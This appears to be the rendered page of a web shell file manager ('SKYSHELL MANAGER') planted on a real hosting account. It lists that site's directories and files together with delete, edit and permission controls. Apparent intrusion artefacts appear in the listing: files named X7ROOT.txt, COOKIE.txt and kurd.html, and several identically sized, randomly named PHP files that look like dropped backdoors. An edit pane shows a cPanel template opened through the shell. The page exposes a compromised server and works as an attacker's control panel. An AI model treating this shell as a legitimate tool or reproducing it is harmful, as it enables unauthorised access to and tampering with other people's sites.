📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: dotweaksettings.tmpl
[%- USE Whostmgr; IF start; PROCESS 'master_templates/_defheader.tmpl' breadcrumburl = '/scripts2/tweaksettings' theme="yui" extrastyle = '.setting_label { font-weight: bold }' ; '<h3 class="simpleheading">Updating tweak settings...</h3>'; '<br />'; ELSIF saved; FOREACH key = rejects.keys.sort(); SET setting_data = ts_conf.$key; SET value_text = rejects.defined( key ) ? "${rejects.$key}" : 'undefined' ; SET reason_text = reject_reasons.defined( key ) ? reject_reasons.$key : 'unknown reason' ; SET value_text = value_text.html; SET esc_key = key.html; SET reason_text = reason_text.html; "<p>Invalid value for “${esc_key}”: “${value_text}” - ${reason_text}. This setting will not be updated.</p>"; END; '<span class="b2">Your changes have been saved.</span><br />'; '<br />'; '<span class="b2">Restarting cPanel daemons...</span>'; ELSIF restarted; '<span class="b2">done.</span><br />'; '<br />'; '<span class="b2">Updating your system to reflect any changes...</span><br />'; '<pre>'; ELSIF updating; IF newvalue.defined; IF setting_data.type == 'password'; SET newvalue = '**********'; ELSIF setting_data.type == 'binary'; SET newvalue = newvalue ? 'On' : 'Off'; ELSIF setting_data.type == 'inversebinary'; SET newvalue = newvalue ? 'Off' : 'On'; ELSIF optionlabels && optionlabels.defined( newvalue ); SET newvalue = optionlabels.$newvalue; ELSE; SET newvalue = "${newvalue}"; END; ELSE; SET newvalue = undef_label || 'ERROR'; END; SET newvalue = newvalue.html; IF is_new_setting; "Creating new setting for <span class=\"setting_label\">“${label}”</span> of “${newvalue}”. "; ELSE; IF oldvalue.defined; IF setting_data.type == 'password'; SET oldvalue = '**********'; ELSIF setting_data.type == 'binary'; SET oldvalue = oldvalue ? 'On' : 'Off'; ELSIF setting_data.type == 'inversebinary'; SET oldvalue = oldvalue ? 'Off' : 'On'; ELSIF optionlabels && optionlabels.defined( oldvalue ); SET oldvalue = optionlabels.$oldvalue; ELSE; SET oldvalue = "${oldvalue}"; END; ELSE; SET oldvalue = undef_label || 'ERROR'; END; SET oldvalue = oldvalue.html; "Updating <span class=\"setting_label\">“${label}”</span> from “$oldvalue” to “${newvalue}”.\n"; END; ELSIF post_action.defined(); "Processing post action for <span class=\"setting_label\">$label</span>:\n"; ELSIF is_ok.defined(); IF is_ok; "<span class=\"setting_label\">“$label”</span> was updated.\n"; ELSE; IF changed_value; "There was an error updating “$label”: $error\n"; ELSE; SET esc_key = key.html; "While trying to rectify your configuration for “${esc_key}” an error was encountered: $error\n"; END; END; ELSIF done; '</pre>'; '<span class="b2">Done.</span>'; ELSIF not_saved; "Error encountered while applying new settings. Changes were not saved.\n"; END; -%]
Save